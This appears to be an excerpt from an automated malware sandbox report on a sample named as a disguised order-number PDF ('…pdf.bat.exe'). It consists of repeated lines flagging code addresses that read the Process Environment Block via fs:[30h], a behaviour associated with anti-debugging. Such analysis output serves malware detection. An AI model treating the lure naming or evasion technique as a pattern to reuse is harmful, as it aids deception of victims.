            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336112ED mov eax, dword ptr fs:[00000030h]5_2_336112ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B2F0 mov eax, dword ptr fs:[00000030h]5_2_3360B2F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B2F0 mov eax, dword ptr fs:[00000030h]5_2_3360B2F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335692C5 mov eax, dword ptr fs:[00000030h]5_2_335692C5
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335692C5 mov eax, dword ptr fs:[00000030h]5_2_335692C5
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B2C0 mov eax, dword ptr fs:[00000030h]5_2_3358B2C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F2F8 mov eax, dword ptr fs:[00000030h]5_2_3361F2F8
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335592FF mov eax, dword ptr fs:[00000030h]5_2_335592FF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336292A6 mov eax, dword ptr fs:[00000030h]5_2_336292A6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336292A6 mov eax, dword ptr fs:[00000030h]5_2_336292A6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336292A6 mov eax, dword ptr fs:[00000030h]5_2_336292A6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336292A6 mov eax, dword ptr fs:[00000030h]5_2_336292A6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359329E mov eax, dword ptr fs:[00000030h]5_2_3359329E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359329E mov eax, dword ptr fs:[00000030h]5_2_3359329E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635283 mov eax, dword ptr fs:[00000030h]5_2_33635283
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E92BC mov eax, dword ptr fs:[00000030h]5_2_335E92BC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E92BC mov eax, dword ptr fs:[00000030h]5_2_335E92BC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E92BC mov ecx, dword ptr fs:[00000030h]5_2_335E92BC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E92BC mov ecx, dword ptr fs:[00000030h]5_2_335E92BC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335752A0 mov eax, dword ptr fs:[00000030h]5_2_335752A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335752A0 mov eax, dword ptr fs:[00000030h]5_2_335752A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335752A0 mov eax, dword ptr fs:[00000030h]5_2_335752A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335752A0 mov eax, dword ptr fs:[00000030h]5_2_335752A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F72A0 mov eax, dword ptr fs:[00000030h]5_2_335F72A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F72A0 mov eax, dword ptr fs:[00000030h]5_2_335F72A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33567152 mov eax, dword ptr fs:[00000030h]5_2_33567152
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559148 mov eax, dword ptr fs:[00000030h]5_2_33559148
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559148 mov eax, dword ptr fs:[00000030h]5_2_33559148
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559148 mov eax, dword ptr fs:[00000030h]5_2_33559148
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559148 mov eax, dword ptr fs:[00000030h]5_2_33559148
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3140 mov eax, dword ptr fs:[00000030h]5_2_335F3140
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3140 mov eax, dword ptr fs:[00000030h]5_2_335F3140
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3140 mov eax, dword ptr fs:[00000030h]5_2_335F3140
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F9179 mov eax, dword ptr fs:[00000030h]5_2_335F9179
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F172 mov eax, dword ptr fs:[00000030h]5_2_3355F172
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635152 mov eax, dword ptr fs:[00000030h]5_2_33635152
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B136 mov eax, dword ptr fs:[00000030h]5_2_3355B136
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B136 mov eax, dword ptr fs:[00000030h]5_2_3355B136
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B136 mov eax, dword ptr fs:[00000030h]5_2_3355B136
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B136 mov eax, dword ptr fs:[00000030h]5_2_3355B136
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561131 mov eax, dword ptr fs:[00000030h]5_2_33561131
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561131 mov eax, dword ptr fs:[00000030h]5_2_33561131
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359D1D0 mov eax, dword ptr fs:[00000030h]5_2_3359D1D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359D1D0 mov ecx, dword ptr fs:[00000030h]5_2_3359D1D0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336071F9 mov esi, dword ptr fs:[00000030h]5_2_336071F9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336351CB mov eax, dword ptr fs:[00000030h]5_2_336351CB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335851EF mov eax, dword ptr fs:[00000030h]5_2_335851EF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335651ED mov eax, dword ptr fs:[00000030h]5_2_335651ED
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336111A4 mov eax, dword ptr fs:[00000030h]5_2_336111A4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336111A4 mov eax, dword ptr fs:[00000030h]5_2_336111A4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336111A4 mov eax, dword ptr fs:[00000030h]5_2_336111A4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336111A4 mov eax, dword ptr fs:[00000030h]5_2_336111A4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B7190 mov eax, dword ptr fs:[00000030h]5_2_335B7190
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33615180 mov eax, dword ptr fs:[00000030h]5_2_33615180
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33615180 mov eax, dword ptr fs:[00000030h]5_2_33615180
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357B1B0 mov eax, dword ptr fs:[00000030h]5_2_3357B1B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635060 mov eax, dword ptr fs:[00000030h]5_2_33635060
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358B052 mov eax, dword ptr fs:[00000030h]5_2_3358B052
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov ecx, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD070 mov ecx, dword ptr fs:[00000030h]5_2_335DD070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E106E mov eax, dword ptr fs:[00000030h]5_2_335E106E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360705E mov ebx, dword ptr fs:[00000030h]5_2_3360705E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360705E mov eax, dword ptr fs:[00000030h]5_2_3360705E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335890DB mov eax, dword ptr fs:[00000030h]5_2_335890DB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD0C0 mov eax, dword ptr fs:[00000030h]5_2_335DD0C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD0C0 mov eax, dword ptr fs:[00000030h]5_2_335DD0C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336350D9 mov eax, dword ptr fs:[00000030h]5_2_336350D9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335850E4 mov eax, dword ptr fs:[00000030h]5_2_335850E4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335850E4 mov ecx, dword ptr fs:[00000030h]5_2_335850E4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33565096 mov eax, dword ptr fs:[00000030h]5_2_33565096
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359909C mov eax, dword ptr fs:[00000030h]5_2_3359909C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D090 mov eax, dword ptr fs:[00000030h]5_2_3358D090
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D090 mov eax, dword ptr fs:[00000030h]5_2_3358D090
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D08D mov eax, dword ptr fs:[00000030h]5_2_3355D08D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335ED080 mov eax, dword ptr fs:[00000030h]5_2_335ED080
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335ED080 mov eax, dword ptr fs:[00000030h]5_2_335ED080
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573740 mov eax, dword ptr fs:[00000030h]5_2_33573740
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573740 mov eax, dword ptr fs:[00000030h]5_2_33573740
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573740 mov eax, dword ptr fs:[00000030h]5_2_33573740
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33633749 mov eax, dword ptr fs:[00000030h]5_2_33633749
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
